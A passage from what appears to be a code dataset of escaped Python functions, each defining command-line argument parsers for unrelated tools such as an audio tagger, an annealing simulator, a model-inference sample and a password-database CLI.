subparsers.add_parser('artwork', help='adds or removes artwork from a file')\n artwork_parser.add_argument(\n 'action', choices=['add', 'remove'], help='The artwork action to be performed. The artwork can be added or removed.')\n artwork_parser.add_argument(\n 'type', choices=['mp3', 'flac'], help='The type of file to apply the artwork to.')\n artwork_parser.add_argument(\n '--source', help='The destination file or directory to apply the artwork to. If there is no source then any artwork in the current directory will be used.')\n artwork_parser.add_argument(\n '--destination', help='The destination file or directory to apply the artwork to. If there is no destination then the current directory will be used.')\n mix_parser = subparsers.add_parser('mix', help='adds a mix')\n mix_parser.add_argument('source', help='the source of the mix')\n mix_parser.add_argument('--artist', help='The artist to use for the tag.')\n mix_parser.add_argument('--album', help='The album to use for the mix.')\n mix_parser.add_argument('--title', help='The title to use for the mix.')\n mix_parser.add_argument('--year', help='The year to use for the mix.')\n mix_parser.add_argument('--comment', help='The comment for the mix.')\n return parser", "def make_cli_parser(self):\n super(SaArgParser, self).make_cli_parser()\n self.cli_parser.add_option('--steps', type='int',\n default=mcmc.defaults.NUM_STEPS,\n help=(\"the number of steps to Anneal. \"\n\t\t\t\t\"[default: %default]\")\n )\n self.cli_parser.add_option('--temperature', type='int',\n default=mcmc.defaults.TEMPERATURE,\n help=(\"the starting temperature to anneal from. \"\n \"[default: %default]\")\n )\n self.cli_parser.add_option('--end_temperature', type='int',\n default=mcmc.defaults.END_TEMPERATURE,\n help=(\"the temperature to end annealing.\"\n \"[default: %default]\")\n )\n self.cli_parser.add_option('--activity-threshold',\n type='float',\n default=mcmc.defaults.ACTIVITY_THRESHOLD,\n help=(\"set the (differential) expression threshold at \"\n \"which a gene is considered active [default: \"\n \"%default=-log10(0.05)]\")\n )\n self.cli_parser.add_option('--free-parameters',\n action='store_true',\n help=(\"parameters will be adjusted randomly, rather \"\n \"than incrementally\")\n )\n self.cli_parser.add_option('--disable-swaps', action='store_true',\n help=(\"disables swapping links as an option for \"\n \"transitions\")\n )\n self.cli_parser.add_option('--transition-ratio', type='float',\n default=0.9,\n help=(\"The target ratio of proposed link transitions \"\n \"to proposed parameter transitions [default: \"\n \"%default]\"\n )\n )\n self.cli_parser.add_option('--parameters-outfile',\n default=mcmc.defaults.PARAMETERS_OUTFILE,\n help=(\"the file to which the parameters results should \"\n \"be written [default: %default]\")\n )\n self.cli_parser.add_option('--transitions-outfile',\n default=mcmc.defaults.TRANSITIONS_OUTTFILE,\n help=(\"the file to which the transitions data should \"\n \"be written [default: %default]\")\n )\n self.cli_parser.add_option('--detailed-transitions',\n action='store_true',\n help=(\"Transitions file includes full information about \"\n \"each step's state.\")\n )\n self.cli_parser.add_option('--bzip2', action='store_true',\n help=\"compress transitions file using bzip2\"\n )", "def build_parser(self):\n\n p = argparse.ArgumentParser(\n self.TITLE,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n p.add_argument(\n \"--name\",\n metavar=\"NAME\",\n help=\"Public name of the project, for docs etc.\",\n default=argparse.SUPPRESS\n )\n p.add_argument(\n '--id',\n metavar='IDENT',\n help=\"Internal name of the project, for directories etc.\",\n default=argparse.SUPPRESS\n )\n p.add_argument(\n \"--title\",\n metavar=\"TEXT\",\n help=\"One-line title for the project\",\n required=True,\n default=argparse.SUPPRESS\n )\n p.add_argument(\n \"--template\",\n metavar=\"PATH\",\n help=\"Template name or path\",\n default=self.DEFAULT_TEMPLATE\n )\n p.add_argument(\n \"--update\",\n action=\"store_true\",\n help=\"Update an existing project\",\n default=False\n )\n p.add_argument(\n \"--config\",\n metavar=\"PATH\",\n help=\"Configuration to use\",\n default=self.DEFAULT_CONFIG\n )\n p.add_argument(\n \"--dry-run\", \"-n\",\n action=\"store_true\",\n help=\"Don't generate anything, just validate\",\n default=False\n )\n\n return p", "def build_argument_parser():\n description=\"A simple tool to batch rename given files.\"\n parser = ArgumentParser(description=description)\n parser.add_argument(\"-i\", \"--input-list\", required=False,\n help=\"the path to the input list file.\")\n parser.add_argument(\"-p\", \"--glob-pattern\", default=DEFAULT_GLOB_PATTERN,\n help=\"a glob pattern to filter input files.\")\n return parser", "def parser(cls, *args, **kwargs):\n\n parser = ArgumentParser(*args, **kwargs)\n parser.add_argument('-a', \"--address\",\n help=\"Force entry point address\", default=None)\n parser.add_argument('-b', \"--dumpblocs\", action=\"store_true\",\n help=\"Log disasm blocks\")\n parser.add_argument('-z', \"--singlestep\", action=\"store_true\",\n help=\"Log single step\")\n parser.add_argument('-d', \"--debugging\", action=\"store_true\",\n help=\"Debug shell\")\n parser.add_argument('-g', \"--gdbserver\", type=int,\n help=\"Listen on port @port\")\n parser.add_argument(\"-j\", \"--jitter\",\n help=\"Jitter engine. Possible values are: gcc (default), tcc, llvm, python\",\n default=\"gcc\")\n parser.add_argument(\n '-q', \"--quiet-function-calls\", action=\"store_true\",\n help=\"Don't log function calls\")\n parser.add_argument('-i', \"--dependencies\", action=\"store_true\",\n help=\"Load PE and its dependencies\")\n\n for base_cls in cls._classes_():\n base_cls.update_parser(parser)\n return parser", "def parse(self, command_line=sys.argv[1:]):\n return self._parser.parse_args(command_line)", "def cmdline_parser():\n parser = argparse.ArgumentParser(description=\"\"\" \"\"\")\n parser.add_argument(\"-g\", \"--gta\",\n help=\"\"\"gta sequences\"\"\",\n dest=\"gta\",\n required=True)\n return parser", "def create_parser():\n parser = argparse.ArgumentParser(description='Watching for files containing magictext')\n parser.add_argument('--ext', help='File extensions to filter on, default=.txt', default='.txt')\n parser.add_argument('--poll', help=\"Polling interval in seconds, default=1.0\", type=float, default=1.0)\n parser.add_argument('directory', help='Directory to watch.')\n parser.add_argument('magictext', help='Text to search for within matching files.')\n return parser", "def setup_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\", \"--url\", dest='url', required=True,\n help=\"Falkonry Edge URL\")\n parser.add_argument(\"-i\", \"--input_file\", dest='input', required=True,\n help=\"Input data file to feed into Falkonry Edge Analyzer\")\n parser.add_argument(\"-o\", \"--output_file\", dest='output', required=True,\n help=\"File name to write Falkonry Edge Analyzer output\")\n parser.add_argument(\"-t\", \"--time_column\", dest='time', type=int, required=True,\n help=\"Time column index starting with 0\")\n parser.add_argument(\"-z\", \"--time_zone\", dest='zone', required=True,\n help=\"Time zone\")\n parser.add_argument(\"-f\", \"--time_format\", dest='format', required=True,\n help=\"Timestamp format\")\n parser.add_argument(\"-e\", \"--entity_column\", dest='entity', type=int,\n help=\"Entity column index starting with 0\")\n parser.add_argument(\"-b\", \"--batch_column\", dest='batch', type=int,\n help=\"Batch column index starting with 0\")\n parser.add_argument(\"-r\", \"--input_feed_rate\", dest='rate', type=int, default=1000,\n help=\"Number of records to send to edge per second.\")\n\n return parser", "def build_cli(self):\n parser = argparse.ArgumentParser(\"xsgen\",\n conflict_handler='resolve', argument_default=NotSpecified)\n for plugin in self.plugins:\n plugin.update_argparser(parser)\n self.parser = parser\n return parser", "def get_parser():\n\n parser = argparse.ArgumentParser(description=textwrap.dedent(\"\"\"\n Downloads and tests the md5 and file size of a given version of Anaconda located in\n http://repo.continuum.io/archive/\n\n The version option (-v) allows you to select a specific version of Anaconda to download and test.\n This will include every system's Anaconda distribution for that version (OSX, Windows, Linux)\n\n The --log option will write the results of these tests to a log file. If not enabled, results\n will be written to stdout.\n\n If you already have Anaconda installers inside the pkgs directory and wish to test those without\n downloading new ones, use the --no-download option. NOTE: You will still need to provide the\n version (-v) of the installers.\n \"\"\"), formatter_class=argparse.RawTextHelpFormatter)\n\n parser.add_argument('--log', action='store_true', dest='log', default=False,\n help=\"save a log of any errors discovered\")\n parser.add_argument('-v', '--version', action='store', default=False,\n help=\"version of Anaconda to download and test\")\n parser.add_argument('--no-download', action='store_true', dest='nodl', default=False,\n help=\"test local anaconda packages in pkgs, rather than download new ones\")\n\n return parser", "def build_argparser():\n parser = ArgumentParser()\n parser.add_argument(\"-m\", \"--model\", required=True, type=str,\n help=\"Path to an xml file with a trained model.\")\n parser.add_argument(\"-i\", \"--input\", required=True, type=str,\n help=\"Path to image or video file\")\n parser.add_argument(\"-l\", \"--cpu_extension\", required=False, type=str,\n default=None,\n help=\"MKLDNN (CPU)-targeted custom layers.\"\n \"Absolute path to a shared library with the\"\n \"kernels impl.\")\n parser.add_argument(\"-d\", \"--device\", type=str, default=\"CPU\",\n help=\"Specify the target device to infer on: \"\n \"CPU, GPU, FPGA or MYRIAD is acceptable. Sample \"\n \"will look for a suitable plugin for device \"\n \"specified (CPU by default)\")\n parser.add_argument(\"-pt\", \"--prob_threshold\", type=float, default=0.5,\n help=\"Probability threshold for detections filtering\"\n \"(0.5 by default)\")\n return parser", "def build_argparser():\n parser = ArgumentParser()\n parser.add_argument(\"-m\", \"--model\", required=True, type=str,\n help=\"Path to an xml file with a trained model.\")\n parser.add_argument(\"-i\", \"--input\", required=True, type=str,\n help=\"Path to image or video file\")\n parser.add_argument(\"-l\", \"--cpu_extension\", required=False, type=str,\n default=None,\n help=\"MKLDNN (CPU)-targeted custom layers.\"\n \"Absolute path to a shared library with the\"\n \"kernels impl.\")\n parser.add_argument(\"-d\", \"--device\", type=str, default=\"CPU\",\n help=\"Specify the target device to infer on: \"\n \"CPU, GPU, FPGA or MYRIAD is acceptable. Sample \"\n \"will look for a suitable plugin for device \"\n \"specified (CPU by default)\")\n parser.add_argument(\"-pt\", \"--prob_threshold\", type=float, default=0.5,\n help=\"Probability threshold for detections filtering\"\n \"(0.5 by default)\")\n return parser", "def build_argparser():\n parser = ArgumentParser()\n parser.add_argument(\"-m\", \"--model\", required=True, type=str,\n help=\"Path to an xml file with a trained model.\")\n parser.add_argument(\"-i\", \"--input\", required=True, type=str,\n help=\"Path to image or video file\")\n parser.add_argument(\"-l\", \"--cpu_extension\", required=False, type=str,\n default=None,\n help=\"MKLDNN (CPU)-targeted custom layers.\"\n \"Absolute path to a shared library with the\"\n \"kernels impl.\")\n parser.add_argument(\"-d\", \"--device\", type=str, default=\"CPU\",\n help=\"Specify the target device to infer on: \"\n \"CPU, GPU, FPGA or MYRIAD is acceptable. Sample \"\n \"will look for a suitable plugin for device \"\n \"specified (CPU by default)\")\n parser.add_argument(\"-pt\", \"--prob_threshold\", type=float, default=0.5,\n help=\"Probability threshold for detections filtering\"\n \"(0.5 by default)\")\n return parser", "def build_argparser():\n parser = ArgumentParser()\n parser.add_argument(\"-m\", \"--model\", required=True, type=str,\n help=\"Path to an xml file with a trained model.\")\n parser.add_argument(\"-i\", \"--input\", required=True, type=str,\n help=\"Path to image or video file\")\n parser.add_argument(\"-l\", \"--cpu_extension\", required=False, type=str,\n default=None,\n help=\"MKLDNN (CPU)-targeted custom layers.\"\n \"Absolute path to a shared library with the\"\n \"kernels impl.\")\n parser.add_argument(\"-d\", \"--device\", type=str, default=\"CPU\",\n help=\"Specify the target device to infer on: \"\n \"CPU, GPU, FPGA or MYRIAD is acceptable. Sample \"\n \"will look for a suitable plugin for device \"\n \"specified (CPU by default)\")\n parser.add_argument(\"-pt\", \"--prob_threshold\", type=float, default=0.3,\n help=\"Probability threshold for detections filtering\"\n \"(0.3 by default)\")\n return parser", "def _parse_command_line(self):\n DESCRIPTION = (\n \"Application for searching PyLith .cfg parameter files.\"\n )\n\n parser = argparse.ArgumentParser(description=DESCRIPTION,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--path\", action=\"store\",\n dest=\"searchpath\", default=\".\", help=\"Search path for .cfg files.\")\n parser.add_argument(\"--display\", action=\"store\",\n dest=\"display\", default=\"all\", help=\"List of metadata to display in search results.\")\n parser.add_argument(\"--verbose\", action=\"store_true\", dest=\"verbose\",\n help=\"Report missing metadata.\")\n\n parser.add_argument(\"--keywords\", action=\"store\", dest=\"keywords\",\n help=\"Comma delimited list of keywords for filtering search results.\")\n parser.add_argument(\"--features\", action=\"store\", dest=\"features\",\n help=\"Comma delimited list of features for filtering search results.\")\n parser.add_argument(\"--authors\", action=\"store\", dest=\"authors\",\n help=\"Comma delimited list of authors for filtering search results.\")\n parser.add_argument(\"--version\", action=\"store\", dest=\"version\",\n help=\"PyLith version for filtering search results.\")\n parser.add_argument(\"--incompatible\", action=\"store_true\", dest=\"incompatible\",\n help=\"Filter search results to show incompatible parameter files.\")\n parser.add_argument(\"--output-format\", action=\"store\", dest=\"output_format\", \n help=\"Output format\", default=\"txt\", choices=[\"text\", \"markdown\"])\n\n args = parser.parse_args()\n\n return args", "def setup_parser(cls, option_group, args, mkflag):", "def setup_parser(cls, option_group, args, mkflag):", "def _create_parser(self):\n parser = argparse.ArgumentParser(\n description=description,\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n parser.add_argument(\n '-v',\n '--verbose',\n action='store_true',\n default=False,\n help='Verbose mode (turn on logging.info)')\n\n parser.add_argument(\n '-d',\n '--debug',\n action='store_true',\n default=False,\n help='Debug (turn on logging.debug)')\n\n return parser", "def _create_argument_parser():\n\n parser = argparse.ArgumentParser(\n description=\"Execute a CPAchecker run in the VerifierCloud using the web interface.\"\n + \" Command-line parameters can additionally be read from a file if file name prefixed with '@' is given as argument.\",\n fromfile_prefix_chars=\"@\",\n add_help=False, # conflicts with -heap\n )\n\n parser.add_argument(\"-h\", \"--help\", action=\"help\", help=\"Prints this help.\")\n\n parser.add_argument(\n \"--cloudMaster\",\n dest=\"cloud_master\",\n default=\"https://vcloud.sosy-lab.org/cpachecker/webclient/\",\n metavar=\"HOST\",\n help=\"Sets the webclient host of the VerifierCloud instance to be used.\",\n )\n\n parser.add_argument(\n \"--cloudPriority\",\n dest=\"cloud_priority\",\n metavar=\"PRIORITY\",\n help=\"Sets the priority for this benchmark used in the VerifierCloud. Possible values are IDLE, LOW, HIGH, URGENT.\",\n )\n\n parser.add_argument(\n \"--cloudCPUModel\",\n dest=\"cpu_model\",\n type=str,\n default=None,\n metavar=\"CPU_MODEL\",\n help=\"Only execute runs in the VerifierCloud on CPU models that contain the given string.\",\n )\n\n parser.add_argument(\n \"--cloudUser\",\n dest=\"cloud_user\",\n metavar=\"USER:PWD\",\n help=\"The user and password for the VerifierCloud.\",\n )\n\n parser.add_argument(\n \"--revision\",\n dest=\"revision\",\n metavar=\"BRANCH:REVISION\",\n help=\"The svn revision of CPAchecker to use.\",\n )\n\n parser.add_argument(\n \"-d\", \"--debug\", action=\"store_true\", help=\"Enable debug output\"\n )\n\n parser.add_argument(\n \"-o\",\n \"--outputpath\",\n dest=\"output_path\",\n type=str,\n default=DEFAULT_OUTPUT_PATH,\n help=\"Output prefix for the generated results. \"\n + \"If the path is a folder files are put into it,\"\n + \"otherwise it is used as a prefix for the resulting files.\",\n )\n parser.add_argument(\n \"--resultFilePattern\",\n dest=\"result_file_pattern\",\n type=str,\n default=\"**\",\n help=\"Only files matching this glob pattern are transported back to the client.\",\n )\n\n parser.add_argument(\n \"-T\",\n \"--timelimit\",\n dest=\"timelimit\",\n default=None,\n type=util.parse_timespan_value,\n help=\"Time limit in seconds\",\n metavar=\"SECONDS\",\n )\n\n parser.add_argument(\n \"-M\",\n \"--memorylimit\",\n dest=\"memorylimit\",\n default=None,\n type=util.parse_memory_value,\n help=\"Memory limit\",\n metavar=\"BYTES\",\n )\n\n parser.add_argument(\n \"-c\",\n \"--corelimit\",\n dest=\"corelimit\",\n type=int,\n default=None,\n metavar=\"N\",\n help=\"Limit the tool to N CPU cores.\",\n )\n\n parser.add_argument(\n \"--version\", action=\"version\", version=\"%(prog)s \" + __version__\n )\n return parser", "def _build_arg_parser():\n parser = argparse.ArgumentParser(\n description=_description,\n add_help=True,\n )\n add_generic_args(parser)\n add_diff_args(parser)\n add_filename_args(parser, [\"base\", \"remote\"])\n\n parser.add_argument(\n '-o', '--output',\n default=None,\n help=\"if supplied, the diff is written to this file. \"\n \"Otherwise it is printed to the terminal.\")\n\n return parser", "def make_cli_parser(self):\n usage = \"\"\"\\\npython %prog [OPTIONS] INTERACTIONS_FILE ANNOTATIONS_FILE\n\nARGUMENTS:\n INTERACTIONS_FILE: a CSV file containing interactions. The file\n should have two columns with headings \"interactor1\" and\n \"interactor2\". The file may have additional columns, which will\n be ignored.\n ANNOTATIONS_FILE: a file containing annotations. The annotations\n file may be in one of two formats:\n - GMT format: if the file ends with the extension \".gmt\", it is\n automatically parsed as a GMT-format file. The file is a\n tab-separated (TSV) format with no headers. The first column\n contains the annotation term. The second column contains a\n description. All following columns contain gene IDs for genes\n annotated by that term. Full GMT format specification is\n available from the MSigDB and GSEA website.\n - Two-column format: The file should have a column titled\n \"gene_id\" which has the gene/gene product ID, and a column\n titled \"term\" which contains the term with which the\n gene/product is annotated. The file may have additional\n columns, which will be ignored.\\\n\"\"\"\n self.cli_parser = conflictsparse.ConflictsOptionParser(usage)\n self.cli_parser.add_option('--links-outfile',\n default=LINKS_OUTFILE,\n help=(\"the file to which the links results should \"\n \"be written [default: %default]\")\n )\n self.cli_parser.add_option('--logfile',\n help=(\"the file to which information for the run will \"\n \"be logged [default: {0}]\".format(\n self.logfile_template.format('TIMESTAMP'))\n )\n )", "def create_parser():\n now = datetime.datetime.today()\n default_date = \"{}-{}-{}\".format(now.day, now.month, now.year)\n parser = argparse.ArgumentParser(description=\"Git plugin for automatic insertion of @since and @author annotations \"\n \"into *.java source files in a project.\",\n epilog=\"© Avner & Oded\")\n parser.add_argument(\"-v\", \"--version\", help=\"Display the version of this plugin\", action='store_true')\n parser.add_argument(\"--since\", nargs='?', help=\"Add the @since annotations to project\", const=default_date)\n parser.add_argument(\"--author\", nargs='?', help=\"Add the @author annotations to project\", const=getpass.getuser())\n\n return parser", "def build_argparser():\n parser = ArgumentParser()\n parser.add_argument(\"-m\", \"--model\", required=True, type=str,\n help=\"Path to an xml file with a trained model.\")\n parser.add_argument(\"-i\", \"--input\", required=True, type=str,\n help=\"Path to image or video file\")\n parser.add_argument(\"-l\", \"--cpu_extension\", required=False, type=str,\n default=None,\n help=\"MKLDNN (CPU)-targeted custom layers.\"\n \"Absolute path to a shared library with the\"\n \"kernels impl.\")\n parser.add_argument(\"-d\", \"--device\", type=str, default=\"CPU\",\n help=\"Specify the target device to infer on: \"\n \"CPU, GPU, FPGA or MYRIAD is acceptable. Sample \"\n \"will look for a suitable plugin for device \"\n \"specified (CPU by default)\")\n parser.add_argument(\"-pt\", \"--prob_threshold\", type=float, default=0.5,\n help=\"Probability threshold for detections filtering\"\n \"(0.5 by default)\")\n parser.add_argument('--log_level', type=str, choices=['debug', 'info', 'warning', 'error', 'critical'])\n return parser", "def cmdline_parser():\n parser = argparse.ArgumentParser(description=\"\"\" \"\"\")\n parser.add_argument(\"-i1\",\n help=\"\"\"viral alignments\"\"\",\n dest=\"viral\",\n required=True)\n parser.add_argument(\"-i2\",\n help=\"\"\"GTA alignments\"\"\",\n dest=\"gta\",\n required=True)\n parser.add_argument(\"-o\",\n dest=\"output\",\n help=\"output image file\")\n return parser", "def build_parser():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='CBIS Health check')\n\n parser.add_argument('-uc', '--uc_hostname',\n required=True,\n help='Undercloud hostname (sample rst-exp3-uc)')\n\n parser.add_argument('-o', '--output',\n default='/tmp',\n help='Output folder')\n\n parser.add_argument('-t', '--test', action='store_const', const=True,\n help='Test Flag for dev mode')\n\n parser.add_argument('-tc', '--test_case', choices=[cls.__name__ for cls in BaseCheck.__subclasses__()],\n help=\"Test case to be checked\")\n\n return parser", "def make_parser():\n parser = argparse.ArgumentParser(prog=__file__.replace(\".py\", \"\"),\n description='simple $PATH tool')\n parser.add_argument('-n', '--nocolor', dest=\"color\",\n action=\"store_false\", default=True,\n help='Turn off ANSI color codes.')\n parser.add_argument('-w', '--nowarn', action=\"store_true\",\n help='Turn off path warnings.')\n subs = parser.add_subparsers(title='subcommands',\n description='The subcommands')\n\n sub = subs.add_parser('replace', description=\"Search & Replace $PATH\")\n sub.set_defaults(cmd='path_replace')\n sub.add_argument('terms', nargs='+',\n help='Format: search:replace, search:replace, ...')\n\n sub = subs.add_parser('show', description=\"Show $PATH compoents\")\n sub.set_defaults(cmd='path_show')\n sub.add_argument('-n', '--nocolor', dest=\"color\",\n action=\"store_false\", default=True,\n help='Turn off ANSI color codes.')\n sub.add_argument('-w', '--nowarn', action=\"store_true\",\n help='Turn off path warnings.')\n\n sub = subs.add_parser('which', description=\"Platform agnostic `which -a`\")\n sub.set_defaults(cmd='path_which')\n sub.add_argument('look', help='Look for this executable')\n sub.add_argument('-n', '--nocolor', dest=\"color\",\n action=\"store_false\", default=True,\n help='Turn off ANSI color codes.')\n sub.add_argument('-v', '--version', action=\"store_true\",\n help='Show version of exact matches.')\n\n return parser", "def generate_parser():\n description = \"%(prog)s -- Data handling, normalization, manipulation, and plotting for HiC and 5C experimental data\"\n epilog = \"For command line options of each command, type: %(prog)s <COMMAND> -h\"\n parser = ap.ArgumentParser(description=description, epilog=epilog)\n parser.add_argument(\"--version\", action=\"version\", version=\"%(prog)s %(version_num)s\" % {'prog':parser.prog, 'version_num':VERSION})\n subparsers = parser.add_subparsers(dest='subcommand')\n\n add_connect_subparser(subparsers)\n add_fragments_subparser(subparsers)\n add_fivecdataset_subparser(subparsers)\n add_fivecproject_subparser(subparsers)\n add_fivecnormalize_subparser(subparsers)\n add_complete_fivec_subparser(subparsers)\n add_fivec_heatmap_subparser(subparsers)\n add_fivec_interval_subparser(subparsers)\n add_fivec_combine_replicates_subparser(subparsers)\n add_fends_subparser(subparsers)\n add_hicdataset_subparser(subparsers)\n add_hicproject_subparser(subparsers)\n add_hicnormalize_subparser(subparsers)\n add_complete_hic_subparser(subparsers)\n add_hic_heatmap_subparser(subparsers)\n add_hic_mrheatmap_subparser(subparsers)\n add_hic_interval_subparser(subparsers)\n add_hic_combine_replicates_subparser(subparsers)\n add_quasar_subparser(subparsers)\n return parser", "def _build_parser():\n parser = _ArgumentParser()\n parser.add_argument(\n '-f',\n '--file',\n metavar='PASSDB',\n default=os.path.join(os.path.expanduser('~'), '.storepass.db'),\n help=\"password database file (the default is ~/.storepass.db)\")\n parser.add_argument('-v',\n '--verbose',\n action='count',\n help=\"increase verbosity level\")\n\n # Add sub-commands.\n subparsers = parser.add_subparsers(dest='command')\n _init_parser = subparsers.add_parser(\n 'init', description=\"create a new empty database\")\n _list_parser = subparsers.add_parser('list',\n description=\"list password entries\")\n show_parser = subparsers.add_parser(\n 'show', description=\"display details of a password entry\")\n argument_validity = [(name, [field.name for field in cls.entry_fields])\n for name, cls in _NAME_TO_ENTRY_TYPE_MAP.items()]\n add_edit_epilog = \"property validity for entry types:\\n\" + \"\\n\".join([\n f\" {name + ':':22}{', '.join(args) if len(args) > 0 else '--'}\"\n for name, args in argument_validity\n ])\n add_parser = subparsers.add_parser(\n 'add',\n description=\"add a new password entry\",\n epilog=add_edit_epilog,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n edit_parser = subparsers.add_parser(\n 'edit',\n description=\"edit an existing password entry\",\n epilog=add_edit_epilog,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n delete_parser = subparsers.add_parser(\n 'delete', description=\"delete a password entry\")\n _dump_parser = subparsers.add_parser(\n 'dump', description=\"dump raw database content\")\n\n add_parser.add_argument('--type',\n choices=_NAME_TO_ENTRY_TYPE_MAP.keys(),\n default='generic',\n help=\"entry type (the default is generic)\")\n edit_parser.add_argument('--type',\n choices=_NAME_TO_ENTRY_TYPE_MAP.keys(),\n help=\"entry type\")\n\n # Add command-line arguments to set entry properties.\n for sub_parser in (add_parser, edit_parser):\n common_group = sub_parser.add_argument_group(\n \"optional arguments valid for all entry types\")\n common_group.add_argument(\n '--description',\n metavar='DESC',\n help=\"set the entry description to the specified value\")\n common_group.add_argument(\n '--notes', help=\"set the entry notes to the specified value\")\n\n account_group = sub_parser.add_argument_group(\n \"optional arguments valid for specific entry types\")\n sub_parser.set_defaults(properties={})\n for field in storepass.model.ENTRY_FIELDS:\n if field.is_protected:\n nargs = 0\n help_ = f\"prompt for a value of the {field.name} property\"\n else:\n nargs = None\n help_ = f\"set the {field.name} property to the specified value\"\n account_group.add_argument(\n '--' + field.name,\n metavar=\"VALUE\",\n action=_PropertyAction,\n field=field,\n nargs=nargs,\n #default=argparse.SUPPRESS,\n help=help_)\n\n for sub_parser in (show_parser, add_parser, delete_parser, edit_parser):\n sub_parser.add_argument('entry',\n metavar='ENTRY',\n help=\"password entry\")\n\n return parser", "def build_parser():\n parser = argparse.ArgumentParser(usage='$ python recentfeed.py http://domain.com/rss/',\n description='''Takes a list of URLs passed as args.\n Returns the items published today unless otherwise specified.''',\n epilog='')\n parser.add_argument(\"-v\", \"--verbose\", dest=\"verbose\", default=False, action=\"store_true\")\n parser.add_argument(\"-d\", \"--days\", dest=\"days\", default=0, action=\"count\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output\", default=\"html\", type=str)\n parser.add_argument(\"urls\", action=\"append\", nargs=\"*\")\n return parser", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n help_str = \\\n 'The collection folder to sort files into. ' \\\n 'If the folder does not exist, it will be created along with the ' \\\n 'necessary contents.'\n parser.add_argument('-c', '--collection', help=help_str)\n\n help_str = \\\n 'The source folder to import files from. Has to exist and ' \\\n 'has to be a folder.'\n parser.add_argument('-s', '--source', help=help_str, required=False)\n\n help_str = \\\n 'View the gallery in random order auto skpping after the' \\\n 'given amount of seconds'\n parser.add_argument('-v', '--view', help=help_str, required=False)\n\n return parser.parse_args()", "def make_cli_parser(self):\n super(BplnArgParser, self).make_cli_parser()\n links_opt = self.cli_parser.add_option('--selected-links',\n help=(\"A CSV-formatted file containing pairs of \"\n \"terms to test. Tests will be done to decide \"\n \"if the annotation term from the first column \"\n \"\\\"is linked to\\\" the annotation term from the \"\n \"second column. [NOTE: Selecting this option \"\n \"restricts the program to only test the matches \"\n \"designated in the file.] [NOTE: This option \"\n \"conflicts with '--selected-terms' and \"\n \"'--selected-terms-with-all'.]\"\n )\n )\n anns_opt = self.cli_parser.add_option('--selected-terms',\n help=(\"A file containing annotation terms to test \"\n \"linkage to each other. The file should contain one \"\n \"term per line. Selecting this option restricts the \"\n \"program to only testing the given terms against \"\n \"each other. [NOTE: This option conflicts with \"\n \"'--selected-links' and \"\n \"'--selected-terms-with-all'.]\"\n )\n )\n anns_all_opt = self.cli_parser.add_option(\n '--selected-terms-with-all',\n help=(\"A file containing annotation terms to test \"\n \"linkage to all other terms (one-against-all and \"\n \"all-against-one). The file should contain one \"\n \"term per line. Selecting this option restricts \"\n \"the program to only testing the given terms \"\n \"against all other terms. [NOTE: \"\n \"This option conflicts with '--selected-links' and \"\n \"'--selected-terms'.]\"\n )\n )\n self.cli_parser.register_conflict(\n (links_opt, anns_opt, anns_all_opt))", "def generate_parser():\n description = \"%(prog)s -- Predict RNA expression from cCREs and Ideas states\"\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument('-r', '--rna', dest=\"rna\", type=str, action='store', required=True,\n help=\"RNA expression file\")\n parser.add_argument('-s', '--state', dest=\"state\", type=str, action='store', required=True,\n help=\"State file\")\n parser.add_argument('-c', '--cre', dest=\"cre\", type=str, action='store', required=True,\n help=\"CRE file\")\n parser.add_argument('-l', '--lessone', dest=\"lessone\", type=int, action='store', default=0,\n help=\"Cell type to leave out\")\n parser.add_argument('-o', '--output', dest=\"output\", type=str, action='store', default='./out',\n help=\"Output prefix\")\n parser.add_argument('-i', '--iterations', dest=\"iterations\", type=int, action='store', default=100,\n help=\"Refinement iterations\")\n parser.add_argument('-t', '--threads', dest=\"threads\", type=int, action='store', default=1,\n help=\"Number of threads to use\")\n parser.add_argument('--initialization-dist', dest=\"init_dist\", type=int, action='store', default=1000,\n help=\"Beta initialization distance cutoff\")\n parser.add_argument('--promoter-dist', dest=\"promoter_dist\", type=int, action='store',\n help=\"If specified, learn betas for promoters up to promoter distance cutoff\")\n parser.add_argument('--cre-dist', dest=\"cre_dist\", type=int, action='store',\n help=\"CRE distance cutoff\")\n parser.add_argument('--cre-exclude-promoter', dest=\"cre_noprom\", action='store_true',\n help=\"Exclude promoter from CREs\")\n parser.add_argument('--sum-cres', dest=\"sum_cres\", action='store_true',\n help=\"Sum CREs instead of finding overall proportions\")\n parser.add_argument('--correlation', dest=\"correlation\", type=float, action='store', default=0.0,\n help=\"Initial correlation cutoff\")\n parser.add_argument('--pca', dest=\"pca\", type=float, action='store',\n help=\"Convert state ratios into PCAs explaining this much variance\")\n parser.add_argument('--trainstats', dest=\"train_stats\", action='store_true',\n help=\"Output training statistics\")\n parser.add_argument('--max-CREs', dest=\"max_cres\", action='store', type=int, default=0,\n help=\"Maximum number of CREs allowed to be selected per TSS at a time (0 is no max)\")\n parser.add_argument('--skip-training', dest=\"skip_training\", action='store_true',\n help=\"Skip CRE-TSS pairining refinement\")\n parser.add_argument('--shuffle-states', dest=\"shuffle_states\", action='store_true',\n help=\"Shuffle the state proportions of each CRE as a negative control\")\n parser.add_argument('-e', '--eRP', dest=\"eRP\", action='store', type=str,\n help=\"A previously generated eRP TSS-cCRE pair file. Passing this will ignore initial TSS-CRE pair selection\")\n parser.add_argument('--seed', dest=\"seed\", action='store', type=int,\n help=\"Random number generator state seed\")\n parser.add_argument('-v', '--verbose', dest=\"verbose\", action='store', type=int, default=2,\n help=\"Verbosity level\")\n return parser", "def _init_parser():\n\t\n\t_parser = argparse.ArgumentParser()\n\t_parser.add_argument(\"--pull\", help=\"pull scripts from UR3\", action=\"store_true\")\n\t_parser.add_argument(\"--create\", help=\"create data base from script files\", action=\"store_true\")\n\t_parser.add_argument(\"--clear\", help=\"clear all data base\", action=\"store_true\")\n\treturn _parser", "def setup_parser():\n\n psr_desc=\"cfdi engine service interface\"\n psr_epi=\"select a config profile to specify defaults\"\n\n psr = argparse.ArgumentParser(\n description=psr_desc, epilog=psr_epi)\n\n 